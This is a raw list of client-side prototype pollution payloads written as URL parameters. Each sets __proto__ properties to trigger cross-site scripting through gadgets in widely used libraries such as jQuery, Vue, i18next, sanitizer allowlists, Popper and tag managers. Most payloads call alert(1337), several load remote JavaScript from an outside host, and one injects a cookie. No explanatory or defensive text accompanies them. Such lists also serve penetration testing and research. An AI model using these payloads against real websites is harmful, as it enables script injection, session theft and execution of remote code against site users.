__proto__[innerHTML]=<img/src/onerror%3dalert(1337)>
__proto__[context]=<img/src/onerror%3dalert(1337)>&__proto__[jquery]=x
__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror%3dalert(document.domain)>
__proto__[div][0]=1&__proto__[div][1]=<img src onerror%3dalert(1337)>
__proto__[url][]=data:,alert(1337)//&__proto__[dataType]=script
__proto__[src][]=data:,alert(1337)//
__proto__[url]=data:,alert(1337)//
__proto__[url]=data:,alert(1337)//&__proto__[dataType]=script&__proto__[crossDomain]=
__proto__[OnError]=alert(1337)&__proto__[SRC]=fakeimagewontload
__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror%3Dalert(z)>&__proto__[focus]=x&__proto__[needsContext]=x
__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror%3Dalert(1337)>&__proto__[needsContext]=x
__proto__[srcdoc][]=<script>alert(1337)</script>
__proto__[attrs][src]=1&__proto__[src]=data:,alert(1337)//
__proto__[BOOMR]=1&__proto__[url]=//brutelogic.com.br/1.js
__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1337)
__proto__[*][]=onload
__proto__[innerText]=<script>alert(1337)</script>
__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src
__proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src
__proto__[documentMode]=9
__proto__[*%20ONERROR]=1&__proto__[*%20SRC]=1
__proto__[CLOSURE_BASE_PATH]=data:,alert(1337)//
__proto__[trustedTypes]=x&__proto__[emptyHTML]=<img/src/onerror%3dalert(1337)>
__proto__[tagName]=img&__proto__[src][]=x:&__proto__[onerror][]=alert(1337)
__proto__[src]=data:,alert(1337)//
__proto__[SRC]=<img/src/onerror%3dalert(1337)>
__proto__[xxx]=alert(1337)
__proto__[onload]=alert(1337)
__proto__[script][0]=1&__proto__[script][1]=<img/src/onerror%3dalert(1337)>&__proto__[script][2]=1
__proto__[4]=a':1,[alert(1337)]:1,'b&__proto__[5]=,
__proto__[onerror]=alert(1337)
__proto__[html]=<img/src/onerror%3dalert(1337)>
__proto__[div][intro]=<img%20src%20onerror%3dalert(1337)>
__proto__[v-if]=_c.constructor('alert(1337)')()
__proto__[attrs][0][name]=src&__proto__[attrs][0][value]=xxx&__proto__[xxx]=data:,alert(1337)//&__proto__[is]=script
__proto__[v-bind:class]=''.constructor.constructor('alert(1337)')()
__proto__[data]=a&__proto__[template][nodeType]=a&__proto__[template][innerHTML]=<script>alert(1337)</script>
__proto__[props][][value]=a&__proto__[name]=":''.constructor.constructor('alert(1337)')(),"
__proto__[template]=<script>alert(1337)</script>
__proto__[customScriptSrc]=//brutelogic.com.br/1.js
__proto__[lng]=cimode&__proto__[appendNamespaceToCIMode]=x&__proto__[nsSeparator]=<img/src/onerror%3dalert(1337)>
__proto__[lng]=a&__proto__[a]=b&__proto__[obj]=c&__proto__[k]=d&__proto__[d]=<img/src/onerror%3dalert(1337)>
__proto__[lng]=a&__proto__[key]=<img/src/onerror%3dalert(1337)>
__proto__[cookieName]=COOKIE%3DInjection%3B
__proto__[q][0][0]=require&__proto__[q][0][1]=x&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7
__proto__[arrow][style]=color:red;transition:all%201s&__proto__[arrow][ontransitionend]=alert(1337)
__proto__[reference][style]=color:red;transition:all%201s&__proto__[reference][ontransitionend]=alert(2)
__proto__[popper][style]=color:red;transition:all%201s&__proto__[popper][ontransitionend]=alert(3)
__proto__[dataHost]=brutelogic.com.br/1.js%23
x=x&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1337)>
__proto__[vtp_enableRecaptcha]=1&__proto__[srcdoc]=<script>alert(1337)</script>
